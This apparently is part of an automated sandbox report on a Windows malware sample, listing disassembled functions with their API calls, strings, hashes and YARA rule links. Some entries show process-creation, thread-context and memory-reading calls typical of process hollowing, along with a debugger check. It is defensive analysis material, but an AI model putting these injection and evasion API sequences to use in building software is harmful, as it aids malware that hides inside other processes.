Opcode Fuzzy Hash: 4ba97a852c10cc1d72664f7b0623e16ce24003c929f44f8a23f7656d10e3e8c4
Instruction Fuzzy Hash: E021C331A002589BCB51DF94CC45BEE7BFC9F49300F00805AE809EB281DFB8598E8FA1

Function 00B0901B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00B09036
__fread_nolock.LIBCMT ref: 00B0904B

Strings

EA06, xrefs: 00B0907D

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: 573e19caa0931ab4420a10afb7a95aacbcd04a8b849a59b891615316c2d0bef1
Instruction ID: 778685d44043bc47871342a41496733034f62543c0681a3ad65be711e2e04dd4
Opcode Fuzzy Hash: 573e19caa0931ab4420a10afb7a95aacbcd04a8b849a59b891615316c2d0bef1
Instruction Fuzzy Hash: 4901B972D042586EDB28C6A8C856FEE7BF8DB15301F00419EF552D2181E575E60897A0

Function 00B09B6D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00B09B82
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00B09B99

Strings

aut, xrefs: 00B09B93

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: d500f369ade13ce21cad766b6497d012cf58a9471b070084b49ff6e6944372a4
Instruction ID: 783e337058d75015a1d2539c4634f9b16073b6a67a4ff26457dcdf80c305f5ce
Opcode Fuzzy Hash: d500f369ade13ce21cad766b6497d012cf58a9471b070084b49ff6e6944372a4
Instruction Fuzzy Hash: 4AD05E7994030EABDB209B90DC0EFAA777CE704701F0042F1BF54921A1DEB055998BA1

Function 00B1CDF1 Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c56ac3233b2c8cccab1be6590bde15718a7c06a511c20f88f0ef9473739e1d79
Instruction ID: 190d654f4048254c0833b0664e934eaff83b63d3ccbeb62d79acd62c985c8f20
Opcode Fuzzy Hash: c56ac3233b2c8cccab1be6590bde15718a7c06a511c20f88f0ef9473739e1d79
Instruction Fuzzy Hash: A0F16970A083019FC714DF28C584A6ABBE5FF89314F54896EF8999B391D731E946CF82

Function 00AAF8CF Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON

Download Yara Rule

APIs

Part of subcall function 00AC03A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00AC03D3
Part of subcall function 00AC03A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 00AC03DB
Part of subcall function 00AC03A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00AC03E6
Part of subcall function 00AC03A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00AC03F1
Part of subcall function 00AC03A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 00AC03F9
Part of subcall function 00AC03A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00AC0401

Part of subcall function 00AB6259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00AAFA90), ref: 00AB62B4

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00AAFB2D
OleInitialize.OLE32(00000000), ref: 00AAFBAA
CloseHandle.KERNEL32(00000000), ref: 00AE49F2

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: ca1b1abbcea39cdcc6cd647e3dc02f07d74c574e5b5b099ac42b0374738538bb
Instruction ID: 325ba9f87a45977ee134cc81ccc6df28f7cd71448eb67ea17ee1fab4ceda0932
Opcode Fuzzy Hash: ca1b1abbcea39cdcc6cd647e3dc02f07d74c574e5b5b099ac42b0374738538bb
Instruction Fuzzy Hash: FB81A8B19012409EC784DF2AEE51665BBF8FB99308B10857ED419C73E2EFB98805CF94

Function 00AA43DB Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00AA4401
Shell_NotifyIconW.SHELL32(00000000,?), ref: 00AA44A6
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00AA44C3

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: 1ae599abc72a28eb0c5bc2d0a6dabd46d08933b441908906caf2a8f86546521d
Instruction ID: ed4733fddb8d7206898fa09b2f662eea16103fcf9fc48563e0860e2a8af47a37
Opcode Fuzzy Hash: 1ae599abc72a28eb0c5bc2d0a6dabd46d08933b441908906caf2a8f86546521d
Instruction Fuzzy Hash: 733130715057019FD761DF24D884797BBF8FB8D704F00092EF59A83291EBB5A948CB92

Function 00AC594C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00AC5963

Part of subcall function 00ACA3AB: __NMSG_WRITE.LIBCMT ref: 00ACA3D2
Part of subcall function 00ACA3AB: __NMSG_WRITE.LIBCMT ref: 00ACA3DC

__NMSG_WRITE.LIBCMT ref: 00AC596A

Part of subcall function 00ACA408: GetModuleFileNameW.KERNEL32(00000000,00B643BA,00000104,?,00000001,00000000), ref: 00ACA49A
Part of subcall function 00ACA408: ___crtMessageBoxW.LIBCMT ref: 00ACA548

Part of subcall function 00AC32DF: ___crtCorExitProcess.LIBCMT ref: 00AC32E5
Part of subcall function 00AC32DF: ExitProcess.KERNEL32 ref: 00AC32EE

Part of subcall function 00AC8D68: __getptd_noexit.LIBCMT ref: 00AC8D68

RtlAllocateHeap.NTDLL(01110000,00000000,00000001,00000000,?,?,?,00AC1013,?), ref: 00AC598F

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: ba67b5677682ef13a20672cb4ba018eac9d3a2fdb61c55aa878c57426449420d
Instruction ID: de80b612d13abc4823687590219c63b9fbd7b0f04420a300f6d00f4a43874575
Opcode Fuzzy Hash: ba67b5677682ef13a20672cb4ba018eac9d3a2fdb61c55aa878c57426449420d
Instruction Fuzzy Hash: E601F536700B15DEEA252B74DD52F6E72A89F52B30F13046EF401AB1C1DFB4AD818760

Function 00B09B2C Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00B097D2,?,?,?,?,?,00000004), ref: 00B09B45
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00B097D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00B09B5B
CloseHandle.KERNEL32(00000000,?,00B097D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00B09B62

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: aea1732de9cc8bb516ead71be1714934c794754761dc35969fd50037aade6de4
Instruction ID: 4601423dc45467b00e5d32b3ff5dfd6f92923174da1c0f644c3f6bbc3f0dbf8a
Opcode Fuzzy Hash: aea1732de9cc8bb516ead71be1714934c794754761dc35969fd50037aade6de4
Instruction Fuzzy Hash: E0E08632180315BBD7311B54EC0AFDA7F68EB05771F104230FB147A0E08BB129229798

Function 00B08F97 Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00B08FA5

Part of subcall function 00AC2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00AC9C64), ref: 00AC2FA9
Part of subcall function 00AC2F95: GetLastError.KERNEL32(00000000,?,00AC9C64), ref: 00AC2FBB

_free.LIBCMT ref: 00B08FB6
_free.LIBCMT ref: 00B08FC8

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
Instruction ID: c64c9c17b6cdd73e9252292d507dbf26e91c9937bc0a45bd039f1a8a956f7ee0
Opcode Fuzzy Hash: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
Instruction Fuzzy Hash: 60E012A16097064ACA24B578AE40F935BEE9F48360B190C5DB44ADB182DE24E9518264

Function 00AAAB23 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

CALL, xrefs: 00AE002B

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: 5f966cc26482eb224d8bac411a627c2b6a639e95e43deff78a18a2bfdf725580
Instruction ID: 47e0907588a86de04ee900d2a54cad9c75e6ad40fce168f2fdea7e32964006fd
Opcode Fuzzy Hash: 5f966cc26482eb224d8bac411a627c2b6a639e95e43deff78a18a2bfdf725580
Instruction Fuzzy Hash: C9224874608341DFC724DF14C594B6ABBF1BF96300F15896DE8868B2A2DB71ED81CB92

Function 00AA4DD0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00AA4E1A

Strings

EA06, xrefs: 00ADDCF5

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: _memmove
String ID: EA06
API String ID: 4104443479-3962188686
Opcode ID: ad892f88611d54a23d400ce22163426288ac764dfc947a372cf3b5a94f9ca5c3
Instruction ID: 43fd6bbc58cbd3bbef2f0053cd78c17a31452db358b1095bd14c1c3067cff9f0
Opcode Fuzzy Hash: ad892f88611d54a23d400ce22163426288ac764dfc947a372cf3b5a94f9ca5c3
Instruction Fuzzy Hash: A7415971A04554ABDF319B64C9917FE7FB6AF8B300F284065F8829B2C2C7E19D4483E1

Function 00A42330 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00A4238A

Strings

D, xrefs: 00A42344

Memory Dump Source

Source File: 00000000.00000002.1681768702.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_GkYUK8VCrO.jbxd

Similarity

API ID: CreateProcess
String ID: D
API String ID: 963392458-2746444292
Opcode ID: c44042240367ae80eaa8206569f06584b606a7a7c9118113533914ad92b6354f
Instruction ID: b04ebd144324f622cbcf4e9bf56b652f7749092b894b96997d833cf6fce77e34
Opcode Fuzzy Hash: c44042240367ae80eaa8206569f06584b606a7a7c9118113533914ad92b6354f
Instruction Fuzzy Hash: D101C27594030CABDB20DFE0CC59FFE777CAF84701F508559BA159A180EA78A6488B55

Function 00A4129D Relevance: 3.4, APIs: 2, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 00A41ACD
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00A41AF1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00A41B13
TerminateProcess.KERNELBASE(00000000,00000000,?), ref: 00A41E1C

Memory Dump Source

Source File: 00000000.00000002.1681768702.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_GkYUK8VCrO.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadTerminateThreadWow64
String ID:
API String ID: 572931308-0
Opcode ID: b327fbffe67f088a8ec06bc3364a8d9e1395271827ab643009cfd88a26bb8519
Instruction ID: 370645632204ed863eebf297863f55fd3a65fff1eaee2179a400488f55990f3d
Opcode Fuzzy Hash: b327fbffe67f088a8ec06bc3364a8d9e1395271827ab643009cfd88a26bb8519
Instruction Fuzzy Hash: E112BD24E24658C6EB24DF64D8507DEB232EF68300F1094E9910DEB7A5E77A4F81CF5A

Function 00AA492E Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00AA4992

Part of subcall function 00AC35AC: __lock.LIBCMT ref: 00AC35B2
Part of subcall function 00AC35AC: DecodePointer.KERNEL32(00000001,?,00AA49A7,00AF81BC), ref: 00AC35BE
Part of subcall function 00AC35AC: EncodePointer.KERNEL32(?,?,00AA49A7,00AF81BC), ref: 00AC35C9

Part of subcall function 00AA4A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00AA4A73
Part of subcall function 00AA4A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00AA4A88

Part of subcall function 00AA3B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00AA3B7A
Part of subcall function 00AA3B4C: IsDebuggerPresent.KERNEL32 ref: 00AA3B8C
Part of subcall function 00AA3B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,00B662F8,00B662E0,?,?), ref: 00AA3BFD
Part of subcall function 00AA3B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00AA3C81

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00AA49D2

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: 09a50bc48168b07651382d11342b4bfaff489b4f87fcecf3666a62e791268fec
Instruction ID: 011836fa7d07561c3b208a15b5499f55c54c9ceb80bd0117160bb59b0c592997
Opcode Fuzzy Hash: 09a50bc48168b07651382d11342b4bfaff489b4f87fcecf3666a62e791268fec
Instruction Fuzzy Hash: E9116A719083119BC700EF28DD0591ABFF8EB99750F00862EF055832F1DFB49955CB96

Function 00AA5DF9 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00AA5981,?,?,?,?), ref: 00AA5E27
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00AA5981,?,?,?,?), ref: 00ADE19C

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: b3f4584d1a94934af93b021570799c07f6fa2086fd11ee0bd2105ab5ae5db83d
Instruction ID: 14f7be2c55e283ec85886625b0466981d97a12b02201ba91bf727fd399ba389e
Opcode Fuzzy Hash: b3f4584d1a94934af93b021570799c07f6fa2086fd11ee0bd2105ab5ae5db83d
Instruction Fuzzy Hash: 04019E70644708BEF7345F24CC8AF763AACAB02778F148319BAE56B1E0C7B01E458B58

Function 00AC0FF6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00AC594C: __FF_MSGBANNER.LIBCMT ref: 00AC5963
Part of subcall function 00AC594C: __NMSG_WRITE.LIBCMT ref: 00AC596A
Part of subcall function 00AC594C: RtlAllocateHeap.NTDLL(01110000,00000000,00000001,00000000,?,?,?,00AC1013,?), ref: 00AC598F

std::exception::exception.LIBCMT ref: 00AC102C
__CxxThrowException@8.LIBCMT ref: 00AC1041

Part of subcall function 00AC87DB: RaiseException.KERNEL32(?,?,?,00B5BAF8,00000000,?,?,?,?,00AC1046,?,00B5BAF8,?,00000001), ref: 00AC8830

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: 324fb8398426647b5e01f0921f579797886ad7a5d42d80682dd6ca157df964aa
Instruction ID: 90130f95c24700d5255f5040dbadf42c25a0ee70f42990dab4111009512f1e44
Opcode Fuzzy Hash: 324fb8398426647b5e01f0921f579797886ad7a5d42d80682dd6ca157df964aa
Instruction Fuzzy Hash: AAF0A93550025DA6CB20AB54ED06FDF77E8AF01351F21046EFC0496552EF719A8082D0

Function 00AC582D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 00AC585C
__lock_file.LIBCMT ref: 00AC587D

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: 70385ed728717044e6c00d5679beb2a5f5ae60de3c76a913e773fae2f89f93fe
